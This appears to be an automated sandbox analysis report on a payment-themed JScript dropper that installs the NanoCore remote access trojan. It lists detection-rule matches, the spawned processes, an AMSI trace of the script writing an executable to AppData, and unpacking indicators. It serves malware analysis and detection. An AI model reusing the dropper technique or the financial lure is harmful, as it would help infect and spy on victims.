Source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.fdqkbs.exe.355e3ae.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: fdqkbs.exe PID: 5336, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5316 -s 624

Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe

Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_00403640

Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe	Code function: 1_2_00406D5F	1_2_00406D5F
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 2_2_0040CCEA	2_2_0040CCEA
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 2_2_0040DA1A	2_2_0040DA1A
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 2_2_0040D23B	2_2_0040D23B
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 2_2_0040EEC0	2_2_0040EEC0
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 2_2_0040C799	2_2_0040C799
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 2_2_00480F9C	2_2_00480F9C
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 2_2_00481254	2_2_00481254
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 3_2_0040CBD1	3_2_0040CBD1
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 3_2_022CE471	3_2_022CE471
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 3_2_022CE480	3_2_022CE480
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 3_2_022CBBD4	3_2_022CBBD4
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 3_2_0507F5F8	3_2_0507F5F8
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 3_2_05079788	3_2_05079788
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 3_2_0507A5D0	3_2_0507A5D0
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 3_2_0507A610	3_2_0507A610

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Code function: String function: 00401EE0 appears 33 times

Source: SWIFT MO104978172_1301 EURO 9700.js

Initial sample: Strings found which are bigger than 50

Source: SWIFT MO104978172_1301 EURO 9700.js

ReversingLabs: Detection: 46%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT MO104978172_1301 EURO 9700.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe "C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe"
Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe	Process created: C:\Users\user\AppData\Local\Temp\fdqkbs.exe "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process created: C:\Users\user\AppData\Local\Temp\fdqkbs.exe C:\Users\user\AppData\Local\Temp\fdqkbs.exe
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process created: C:\Users\user\AppData\Local\Temp\fdqkbs.exe "C:\Users\user\AppData\Local\Temp\fdqkbs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe "C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe" "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppD
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5316 -s 624
Source: C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 656
Source: unknown	Process created: C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe "C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe" "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppD
Source: C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 628
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe "C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe	Process created: C:\Users\user\AppData\Local\Temp\fdqkbs.exe "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Process created: C:\Users\user\AppData\Local\Temp\fdqkbs.exe C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe

1_2_00403640

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe

File created: C:\Users\user\AppData\Local\Temp\nse2F02.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winJS@13/22@0/1

Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe

Code function: 1_2_004021AA CoCreateInstance,

1_2_004021AA

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe

Code function: 1_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

1_2_00404AB5

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1808
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{82fe3011-00e2-4a52-9361-cad1a21dd84e}
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5316
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4612

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Code function: 3_2_0040147B GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,

3_2_0040147B

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Command line argument: GetTickCount	2_2_00402571
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Command line argument: Kernel32.dll	2_2_00402571
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Command line argument: Kernel32.dll	2_2_00402571
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Command line argument: Sleep	2_2_00402571
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Command line argument: Kernel32.dll	2_2_00402571
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Command line argument: VirtualAlloc	2_2_00402571
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Command line argument: Kernel32.dll	2_2_00402571
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Command line argument: Notepad	2_2_00402571
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Command line argument: Notepad	2_2_00402571
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Command line argument: Notepad	2_2_00402571

Source: 3.2.fdqkbs.exe.4910000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 3.2.fdqkbs.exe.4910000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.fdqkbs.exe.4910000.9.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source:	Binary string: C:\xampp\htdocs\ab320849c3d04f77b5cc7477929d7dcb\Loader\Release\Loader.pdb source: SWIFT MO104978172_1301 EURO 9700.exe, 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmp, SWIFT MO104978172_1301 EURO 9700.exe, 00000001.00000002.275512291.000000000283E000.00000004.00000020.00020000.00000000.sdmp, fdqkbs.exe, 00000002.00000002.270678669.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, fdqkbs.exe, 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmp, fdqkbs.exe, 00000002.00000000.257316994.0000000000410000.00000002.00000001.01000000.00000007.sdmp, fdqkbs.exe, 00000003.00000000.260606717.0000000000410000.00000002.00000001.01000000.00000007.sdmp, fdqkbs.exe, 00000008.00000000.278941376.0000000000410000.00000002.00000001.01000000.00000007.sdmp, fdqkbs.exe, 00000008.00000002.297962991.0000000000410000.00000002.00000001.01000000.00000007.sdmp, syhbwgs.exe, 0000000B.00000002.298205955.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, syhbwgs.exe, 0000000B.00000000.286300116.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, syhbwgs.exe, 00000015.00000002.314785679.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, syhbwgs.exe, 00000015.00000000.308154727.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, fdqkbs.exe.1.dr, nse2F03.tmp.1.dr, syhbwgs.exe.2.dr
Source:	Binary string: wntdll.pdbUGP source: fdqkbs.exe, 00000002.00000003.265726648.000000001A460000.00000004.00001000.00020000.00000000.sdmp, fdqkbs.exe, 00000002.00000003.262758217.000000001A5F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: fdqkbs.exe, 00000002.00000003.265726648.000000001A460000.00000004.00001000.00020000.00000000.sdmp, fdqkbs.exe, 00000002.00000003.262758217.000000001A5F0000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: CreateObject r:");_Stream.Type("1");_Stream._00000000();ITextStream.WriteLine(" entry:72 o: f:Open");_Stream.Open();_Stream._00000000();ITextStream.WriteLine(" exit:72 o: f:Open r:undefined");IXMLDOMElement.nodeTypedValue();_Stream._00000000();ITextStream.WriteLine(" entry:78 o: f:Write a0:");_Stream.Write("Unsupported parameter type 00002011");_Stream._00000000();ITextStream.WriteLine(" exit:78 o: f:Write r:undefined");IHost.Name();ITextStream.WriteLine(" entry:86 o:Windows%20Script%20Host f:CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:86 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:93 o: f:ExpandEnvironmentStrings a0:%22%25temp%25%22");IWshShell3.ExpandEnvironmentStrings("%temp%");IWshShell3._00000000();ITextStream.WriteLine(" exit:93 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%22");IWshShell3._00000000();ITextStream.WriteLine(" entry:100 o: f:ExpandEnvironmentStrings a0:%22%25appdata%25%22");IWshShell3.ExpandEnvironmentStrings("%appdata%");IWshShell3._00000000();ITextStream.WriteLine(" exit:100 o: f:ExpandEnvironmentStrings r:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%22");_Stream._00000000();ITextStream.WriteLine(" entry:138 o: f:SaveToFile a0:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%20MO104978172_1301%20EURO%209700.exe%22 a1:2");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe", "2");_Stream._00000000();ITextStream.WriteLine(" exit:138 o: f:SaveToFile r:undefined");ITextStream.WriteLine(" entry:147 o:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%20MO104978172_1301%20EURO%209700.exe%22 f:endsWith a0:%22.jar%22");ITextStream.WriteLine(" exec:10 f:");ITextStream.WriteLine(" entry:14 o:C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%20MO104978172_1301%20EURO%209700.exe f:substr a0:66");ITextStream.WriteLine(" exit:14 o:C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%20MO104978172_1301%20EURO%209700.exe f:substr r:%22.exe%22");ITextStream.WriteLine(" exit:147 o:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%20MO104978172_1301%20EURO%209700.exe%22 f:endsWith r:false");ITextStream.WriteLine(" entry:169 o:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%20MO104978172_1301%20EURO%209700.exe%22 f:endsWith a0:%22.vbs%22");ITextStream.WriteLine(" exec:10 f:");ITextStream.WriteLine(" entry:14 o:C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%20MO104978172_1301%20EURO%209700.exe f:substr a0:66");ITextStream.WriteLine(" exit:14 o:C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%20MO104978172_1301%20EURO%209700.exe f:substr r:%22.exe%22");ITextStream.WriteLine(" exit:169 o:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%20MO104978172_1301%20EURO%209700.exe%22 f:endsWith r:false");ITextStream.WriteLine(" entry:174 o:%22C%3A%5CUsers%5Cuser%5CAppData%5CRoaming%5CSWIFT%

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Unpacked PE file: 3.2.fdqkbs.exe.4910000.9.unpack

.NET source code contains potential unpacker

Source: 3.2.fdqkbs.exe.4910000.9.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.fdqkbs.exe.4910000.9.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 2_2_004059D5 push ecx; ret	2_2_004059E8
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 3_2_0040084B push edx; ret	3_2_0040085F
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 3_2_0040D2E1 push ecx; ret	3_2_0040D2F4
Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe	Code function: 3_2_05077648 push eax; iretd	3_2_05077649

Source: C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Code function: 2_2_0040B4A5 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

2_2_0040B4A5

Source: SWIFT MO104978172_1301 EURO 9700.js

String : entropy: 5.98, length: 426786, content: "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4fug4AtAnNIbg

Go to definition

